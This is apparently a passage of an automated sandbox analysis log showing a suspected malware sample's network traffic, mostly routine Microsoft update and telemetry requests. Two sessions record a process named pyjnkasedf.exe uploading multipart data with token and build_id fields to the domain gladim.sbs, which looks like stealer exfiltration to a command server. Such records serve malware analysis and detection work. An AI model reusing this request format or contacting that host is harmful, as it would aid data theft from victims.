                                                                                                                                                                                                                                                      2024-11-30 21:38:28 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      52192.168.2.104977023.218.208.109443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:27 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                                                                                                                                      2024-11-30 21:38:28 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                      Server: Kestrel
                                                                                                                                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                      X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                      X-OSID: 2
                                                                                                                                                                                                                                                      X-CID: 2
                                                                                                                                                                                                                                                      X-CCC: GB
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=251292
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:28 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      X-CID: 2


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      53192.168.2.104976913.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:27 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:28 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 400
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                      x-ms-request-id: 6760f0bc-801e-002a-1f91-3f31dc000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213828Z-174f78459688l8rvhC1EWRtzr00000000egg00000000frhk
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:28 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      54192.168.2.104977594.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:27 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IIEHJEHDBGHIDGDGHCBG
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Content-Length: 505
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:27 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 31 64 61 39 61 65 61 38 30 61 37 38 33 35 61 64 65 33 31 37 64 37 66 65 38 61 63 61 35 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 65 30 30 61 61 35 30 32 65 37 39 61 35 62 36 63 35 34 62 66 63 36 61 33 32 33 31 61 33 62 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                      Data Ascii: ------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="token"851da9aea80a7835ade317d7fe8aca55------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="build_id"5e00aa502e79a5b6c54bfc6a3231a3b5------IIEHJEHDBGHIDGDGHCBGCont
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:28 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      55192.168.2.104977113.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:28 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:28 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 479
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                                      x-ms-request-id: 26935917-f01e-0003-011b-414453000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213828Z-174f78459684bddphC1EWRbht400000011p000000000gpnp
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:28 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      56192.168.2.104977794.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC320OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DHIEHIIEHIEHJKEBKEHJ
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Content-Length: 213453
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 48 49 49 45 48 49 45 48 4a 4b 45 42 4b 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 31 64 61 39 61 65 61 38 30 61 37 38 33 35 61 64 65 33 31 37 64 37 66 65 38 61 63 61 35 35 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 48 49 49 45 48 49 45 48 4a 4b 45 42 4b 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 65 30 30 61 61 35 30 32 65 37 39 61 35 62 36 63 35 34 62 66 63 36 61 33 32 33 31 61 33 62 35 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 48 49 49 45 48 49 45 48 4a 4b 45 42 4b 45 48 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                      Data Ascii: ------DHIEHIIEHIEHJKEBKEHJContent-Disposition: form-data; name="token"851da9aea80a7835ade317d7fe8aca55------DHIEHIIEHIEHJKEBKEHJContent-Disposition: form-data; name="build_id"5e00aa502e79a5b6c54bfc6a3231a3b5------DHIEHIIEHIEHJKEBKEHJCont
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
